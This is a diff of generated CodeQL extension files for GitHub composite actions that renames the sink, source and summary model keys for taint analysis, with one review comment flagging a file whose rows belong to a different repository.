@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index bc1eb54056af..f3a0b47f2c2c 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 842240cfaa20..12011d643963 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 8ff5ee1e2c0a..40ecb17610eb 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 29c5f793fb24..250606588f98 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 2f12293df0ed..f2f5678b8b8a 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 83012e513359..b17eb01f8217 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 8ca211961948..7ebdde766f3d 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f19fd1f6a6f..7f2e1588139e 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 1889fcff1441..eedeb3844223 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f8243352f455..fb6fb0267bb9 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index bd2015a70964..60df7484e7f3 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 501123a82fe5..d0af7b61f989 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 1a17e3db2b8c..8d08848d24c4 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index a125a4bfa8c6..f26f672a586c 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index e8d0cc64792b..5431aad8dca6 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 736c84b68ccf..92c23f9f1fbd 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 062203945c50..52654194d81e 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index aedeb4e1023c..43c274aa0337 100644 
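Review bot: The `googlecloudplatform_dataflowtemplates.model.yml` hunk carries rows for `googlecloudplatform/magic-modules` (`input.repo` sink and `output.changed-files` source), not for the dataflowtemplates action the filename names, and the same `input.repo` sink row appears again in the `googlecloudplatform_magic-modules.model.yml` hunk that follows. This reads like a generator output that was written to the wrong file, so the dataflowtemplates action presumably has no sink or source model at all while magic-modules is modelled twice. The rename to `actionsSinkModel`/`actionsSourceModel` is fine, but it is worth regenerating this file (or checking the generator's filename-to-repo mapping) before the data is relied on.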
--- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 0d8afb086c94..7f8b87fa20ef 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 4756acbf306f..31422a708c5a 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index a0e4acec75a0..30ccfdea6318 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 6acfcf9773f5..9bc22ac93ef0 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 7e0deeea9065..4ec47cb39750 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 18678fe9ecd2..81d137ce5478 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index d9d492f79cd5..79675d59c056 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index d3046ff1fc40..3310a67347cd 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 845fba40a6cf..d12963b43db2 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index bcf51805710b..1c63a9e6d0f7 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e1ff1fa3497c..e120de812c40 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 4c5ef712e587..1be37285c9ef 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 31e1f562877e..aa6e9b684d08 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 298ba1ccbe3b..221aa83de0b0 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 0dc57625890c..710079324272 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index c6fc16750f8b..bff13b29ecc1 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 0cbbd38d4280..1f75dd81c046 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index acc6cb91c076..15604c34a17a 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index c59e989db046..aef7f4f6242c 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] @@ -22,6 +22,6 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index b426dfb250da..f3a26e867ec6 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4a0c3c2d30f5..4feab5714c79 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 74d0ef69f753..3030f81072a0 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index ac8762d24eab..7f8885d1ec78 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 6df9a160ec5d..93e6b1e03122 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 0c2793028a0a..5284159e9db5 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f5bdc3d4bcc9..ac8b8a5150ae 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 161022b8cbea..19e9448994eb 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 391b19170293..82c5713f9435 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file 
